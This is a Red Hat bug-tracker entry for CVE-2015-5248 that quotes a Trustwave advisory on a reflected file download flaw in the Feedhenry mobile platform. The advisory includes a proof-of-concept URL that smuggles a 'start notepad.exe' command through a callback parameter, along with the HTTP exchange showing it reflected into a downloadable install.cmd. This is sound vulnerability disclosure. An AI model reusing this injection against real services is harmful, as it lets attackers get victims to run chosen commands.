Bug 1272326 (CVE-2015-5248)

Summary: CVE-2015-5248 Red Hat Mobile: Reflected Download Vulnerability
Product: [Other] Security Response Reporter: Trevor Jay <tjay>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED WONTFIX QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: jrusnack
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: Unspecified   
OS: Unspecified   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2015-10-16 06:48:55 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Trevor Jay 2015-10-16 06:36:03 UTC
A vulnerability was discovered in the Red Hat Mobile platform allowing a malicious attacker to utilize service for a reflected download attack.

An attacker can craft a URL pointing to a file of their choosing that will, in certain browsers, appear to be downloaded from the Red Hat Mobile platform itself. Such a URL could be used in---for example---a spoof or spear-phishing e-mail to capitalize on user trust.

Acknowledgements:

Red Hat would like to thank Maciej Grela of Trustwave for reporting this issue.

Comment 1 Trevor Jay 2015-10-16 06:40:46 UTC
The original report follows:

Trustwave SpiderLabs Security Advisory:
Reflected File Download in RedHat Feedhenry

Vendor: RedHat Inc. (http://www.redhat.com/) [Open URL]
Product: Feedhenry Enterprise Mobile Application Platform
Version affected: n/a

Product description:
Mobile Platform for Enterprise. Accelerate collaboration & development on Mobile Projects.

Finding 1: Reflected File Download in RedHat Feedhenry
*****Credit: Maciej Grela of Trustwave

A particular request used by the Feedhenry mobile app hosting platform is vulnerable to Reflected File Download [1] in certain browsers. Consider the following URL:

https://example.feedhenry.com/box/srv/1.1/app/init/install.cmd?_callback=start%20notepad.exe%0d%0a&amp;_jsonpdata= [Open URL]{%22appid%22:%22<application_id>%22,%22appkey%22:%22<application_key>%22}

A similar URL is used by the application code at initialization, the above was significantly optimized. Please note, that the appid and appkey values need to be valid.
Fetching this URL results in the following request/response pair:

8<------------------------------------------------
GET /box/srv/1.1/app/init/install.cmd?_callback=start%20notepad.exe%0d%0a&_jsonpdata={%22appid%22:%22<application_id>%22,%22appkey%22:%22<application_key>%22} HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Accept-Encoding: gzip, deflate                                                                                                                                                                                                               
Proxy-Connection: Keep-Alive                                                                                                                                                                                                                 
Host: example.feedhenry.com

8<------------------------------------------------

Response:

8<------------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 30 Mar 2015 13:01:28 GMT
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL" policyref="/box/p3p.xml"
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Last-Modified: Mon, 30 Mar 2015 13:01:28 GMT
ETag: "<etag>"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 392

start notepad.exe
({"apptitle":"Fake App","domain":"example","firstTime":false,"hosts":{"debugCloudType":"node","debugCloudUrl":"https://debug-url.feedhenry.net [Open URL]","releaseCloudType":"node","releaseCloudUrl":"https://release-url.feedhenry.net [Open URL]"},"init":{"trackId":"<track_id>"},"status":"ok"});
8<------------------------------------------------

This kind of response result in a response that will be interpreted by certain browsers (IE8 on Windows 7 [3] was tested as a proof of concept) as an apparent file download from the example.feedhenry.com domain with both the file name (install.cmd) and contents controlled by the attacker. This allows to execute arbitrary code when the victim launches the downloaded file.

This is just a very simple proof of concept, please refer to the BlackHat 2014 talk [2] and TW Spiderlabs blog [1] for more details about this vulnerability and ways to mitigate it.


References
1. https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/ [Open URL]
2. https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf [Open URL]
3. https://www.modern.ie/en-us/virtualization-tools [Open URL]


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com [Open URL]

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs [Open URL]

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

Comment 2 Trevor Jay 2015-10-16 06:48:55 UTC
This vulnerability has been assigned a LOW impact. Users must be tricked into downloading and running the payload and the browser compatibility is limited. It cannot be used to directly attack users or compromise an application.

I am closing this vulnerability WONTFIX. This BZ exist to track the CVE should it be incidentally fixed in a rebase.